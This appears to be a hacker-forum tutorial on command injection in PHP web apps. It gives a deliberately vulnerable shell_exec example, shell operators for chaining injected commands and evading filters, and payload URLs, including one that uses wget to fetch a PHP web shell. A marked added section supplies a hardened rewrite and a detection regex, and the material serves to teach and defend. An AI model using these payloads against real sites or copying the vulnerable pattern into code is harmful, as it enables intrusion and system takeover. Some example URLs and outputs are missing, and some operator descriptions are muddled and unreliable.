What you will need:
- At least a basic knowledge of unix systems
- A brain
The whole point of command injection is to inject and execute, in the vulnerable application, malicious commands specified by the attacker. Most of the time, web applications need to call backend programs or applications to complete some functionality. This can prove disastrous because developers get lazy and don’t take proper measures to secure their scripts, which most likely leads to their system being compromised (lel).
Example of poor, lazy coding:
<?php echo shell_exec('cat '.$_GET['filename']); ?>
Why is this a problem?
I’m glad you asked. In case you don’t have any knowledge of PHP: this script accepts user input without sanitizing it, which is bad D: In a normal situation a user might go to a link like:
And it would display some example text:
Okay, so all I have to do now is add a nice little semicolon and a shell command to exploit this.
The output would be something like:
Here is some visible content, blah blah example.txt config.php IchiIsAwesome.txt
[0x0b] How to perform an attack:
In the last section I showed you a basic example of how command injection works. Now we’re gonna talk about different injections and how they’re executed.
It’s reasonable to assume that a developer with half a brain would filter out some of the most common forms of command injection, such as the semicolon. Well, there are ways around that. Here are some operators you can use:
Pipes allow the user to chain multiple commands together. A pipe redirects the output of one command straight into the next, so you can execute unlimited commands by chaining them with multiple pipes. Cool? Yes.
Example: ; and $
Here you find the semicolon from the original example. Adding a semicolon tells the command line to execute everything before the semicolon, then execute everything after it as if it were typed on a fresh command line.
Example: $ and && and ||
These operators perform logical operations on the commands around them: && runs the next command only if the previous one succeeded, and || only if it failed. Simple as that.
How they’re used:
- `shell_command` – executes the command
- $(shell_command) – executes the command
- | shell_command – executes the command and returns its output
- || shell_command – executes the command and returns its output
- ; shell_command – executes the command and returns its output
- && shell_command – executes the command and returns its output
- > target_file – overwrites target_file with the output of the previous command
- >> target_file – appends the output of the previous command to target_file
- < target_file – sends the contents of target_file to the previous command
These are just a few examples of command injection vectors; get creative and use your imagination. If you have knowledge of the system you’re exploiting, it shouldn’t be hard.
www.example.com/viewcontent.php?file=example.txt&& wget [location of php shell]
www.example.com/viewcontent.php?file=example.txt&& ls -X
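The viewcontent.php script from the start of the tutorial, rewritten so that none of the operators listed above ever reach a shell, plus a small check that logs attempts for the people on the other side. This is an added example, not code from the original post; CONTENT_DIR, the `file` parameter name and PHP 8 are assumptions.

```php
<?php
// Added example (not from the original tutorial): viewcontent.php rewritten so
// user input never reaches a shell. CONTENT_DIR and the "file" parameter name
// are assumptions for illustration; requires PHP 8 (str_contains/str_starts_with).
declare(strict_types=1);

const CONTENT_DIR = '/var/www/content';   // assumed directory of viewable files

// Detection helper: true if the value contains any of the operators used in
// the injection examples (; | & ` $ ( ) < >) or whitespace. Log these.
function looksLikeInjection(string $value): bool
{
    return preg_match('/[;|&`$()<>\s]/', $value) === 1;
}

// Safe viewer: no shell at all. The name must be a bare file name (no "/",
// no NUL byte) and must resolve to a regular file inside CONTENT_DIR.
function readContentFile(string $name): ?string
{
    if ($name === '' || str_contains($name, "\0") || $name !== basename($name)) {
        return null;                                  // empty, NUL byte, or traversal
    }
    $path = realpath(CONTENT_DIR . '/' . $name);
    if ($path === false || !is_file($path) || !str_starts_with($path, CONTENT_DIR . '/')) {
        return null;                                  // missing, a directory, or outside CONTENT_DIR
    }
    return file_get_contents($path);
}

// If a shell command is genuinely unavoidable, quote the argument so every
// metacharacter becomes literal text. Still prefer readContentFile().
function catViaShell(string $name): string
{
    $out = shell_exec('cat ' . escapeshellarg(CONTENT_DIR . '/' . basename($name)));
    return is_string($out) ? $out : '';
}

$file = is_string($_GET['file'] ?? null) ? $_GET['file'] : '';   // file[]=x is not a string
if (looksLikeInjection($file)) {
    error_log('possible command injection attempt: ' . $file);   // feed this to monitoring
    http_response_code(400);
    exit;
}
$content = readContentFile($file);
if ($content === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: text/plain; charset=utf-8');
echo $content;
```

With this in place, `?file=example.txt; ls` is rejected and logged, and `?file=../config.php` returns 404 because it is no longer a bare file name.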
Command injection is an extremely dangerous vulnerability, as it can be used to escalate privileges on the system and gain complete control. It usually goes something like this:
- Establish a custom script that serves as a shell
- Monitor processes and audit the system
- Find other vulnerabilities and exploit them. Gain control. ???. Profit
All you need to exploit this deadly vulnerability is knowledge of the system you’re exploiting, either *nix or winhoes, and patience. I know it was a quick tutorial, but there’s only so much I could write before it became complete and utter spoon-feeding, and no one really benefits from that. Hope you enjoyed reading. I welcome constructive criticism on what I should add or take out, and tips for future tuts. Thanks.